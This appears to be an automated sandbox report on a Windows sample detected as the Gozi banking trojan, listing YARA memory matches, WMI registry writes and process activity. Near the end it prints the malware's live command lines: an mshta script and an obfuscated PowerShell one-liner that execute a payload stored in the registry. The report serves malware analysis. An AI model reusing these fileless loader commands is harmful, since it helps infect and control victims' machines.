Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: bf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Windows\System32\control.exe Code function: 12_2_004963E0 12_2_004963E0
Source: C:\Windows\System32\control.exe Code function: 12_2_0049D6F0 12_2_0049D6F0
Source: C:\Windows\System32\control.exe Code function: 12_2_004A8868 12_2_004A8868
Source: C:\Windows\System32\control.exe Code function: 12_2_0048887C 12_2_0048887C
Source: C:\Windows\System32\control.exe Code function: 12_2_0049887C 12_2_0049887C
Source: C:\Windows\System32\control.exe Code function: 12_2_004A9010 12_2_004A9010
Source: C:\Windows\System32\control.exe Code function: 12_2_0048A89C 12_2_0048A89C
Source: C:\Windows\System32\control.exe Code function: 12_2_0048B14C 12_2_0048B14C
Source: C:\Windows\System32\control.exe Code function: 12_2_0049594C 12_2_0049594C
Source: C:\Windows\System32\control.exe Code function: 12_2_0049996C 12_2_0049996C
Source: C:\Windows\System32\control.exe Code function: 12_2_00482178 12_2_00482178
Source: C:\Windows\System32\control.exe Code function: 12_2_00495108 12_2_00495108
Source: C:\Windows\System32\control.exe Code function: 12_2_004929EC 12_2_004929EC
Source: C:\Windows\System32\control.exe Code function: 12_2_0049F26C 12_2_0049F26C
Source: C:\Windows\System32\control.exe Code function: 12_2_0049DA04 12_2_0049DA04
Source: C:\Windows\System32\control.exe Code function: 12_2_00494A1C 12_2_00494A1C
Source: C:\Windows\System32\control.exe Code function: 12_2_0048E2D4 12_2_0048E2D4
Source: C:\Windows\System32\control.exe Code function: 12_2_0048D2F4 12_2_0048D2F4
Source: C:\Windows\System32\control.exe Code function: 12_2_0048C340 12_2_0048C340
Source: C:\Windows\System32\control.exe Code function: 12_2_0049FBE8 12_2_0049FBE8
Source: C:\Windows\System32\control.exe Code function: 12_2_004863F0 12_2_004863F0
Source: C:\Windows\System32\control.exe Code function: 12_2_004833F4 12_2_004833F4
Source: C:\Windows\System32\control.exe Code function: 12_2_00488BB0 12_2_00488BB0
Source: C:\Windows\System32\control.exe Code function: 12_2_004983B4 12_2_004983B4
Source: C:\Windows\System32\control.exe Code function: 12_2_00490C28 12_2_00490C28
Source: C:\Windows\System32\control.exe Code function: 12_2_00497484 12_2_00497484
Source: C:\Windows\System32\control.exe Code function: 12_2_004A7498 12_2_004A7498
Source: C:\Windows\System32\control.exe Code function: 12_2_004A6D20 12_2_004A6D20
Source: C:\Windows\System32\control.exe Code function: 12_2_004A45A0 12_2_004A45A0
Source: C:\Windows\System32\control.exe Code function: 12_2_004A1E44 12_2_004A1E44
Source: C:\Windows\System32\control.exe Code function: 12_2_004A466A 12_2_004A466A
Source: C:\Windows\System32\control.exe Code function: 12_2_00481E64 12_2_00481E64
Source: C:\Windows\System32\control.exe Code function: 12_2_004A8604 12_2_004A8604
Source: C:\Windows\System32\control.exe Code function: 12_2_00499E18 12_2_00499E18
Source: C:\Windows\System32\control.exe Code function: 12_2_00492EC4 12_2_00492EC4
Source: C:\Windows\System32\control.exe Code function: 12_2_0048B6DC 12_2_0048B6DC
Source: C:\Windows\System32\control.exe Code function: 12_2_004926E8 12_2_004926E8
Source: C:\Windows\System32\control.exe Code function: 12_2_0049AEF8 12_2_0049AEF8
Source: C:\Windows\System32\control.exe Code function: 12_2_004A4694 12_2_004A4694
Source: C:\Windows\System32\control.exe Code function: 12_2_004846B0 12_2_004846B0
Source: C:\Windows\System32\control.exe Code function: 12_2_00498F68 12_2_00498F68
Source: C:\Windows\System32\control.exe Code function: 12_2_004897E0 12_2_004897E0
Source: C:\Windows\System32\control.exe Code function: 12_2_00493FF8 12_2_00493FF8
Contains functionality to call native functions
Source: C:\Windows\System32\control.exe Code function: 12_2_004A0A50 NtQueryInformationProcess, 12_2_004A0A50
Source: C:\Windows\System32\control.exe Code function: 12_2_0049342C NtSetInformationProcess, 12_2_0049342C
Source: C:\Windows\System32\control.exe Code function: 12_2_00494E14 NtQueryInformationProcess, 12_2_00494E14
Source: C:\Windows\System32\control.exe Code function: 12_2_0049E6C4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 12_2_0049E6C4
Source: C:\Windows\System32\control.exe Code function: 12_2_004BD002 NtProtectVirtualMemory,NtProtectVirtualMemory, 12_2_004BD002
Sample file is different than original file name gathered from version info
Source: bf.exe, 00000000.00000003.676183930.0000000003FC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs bf.exe
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: bf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bf.exe Virustotal: Detection: 76%
Source: bf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\bf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\bf.exe C:\Users\user\Desktop\bf.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
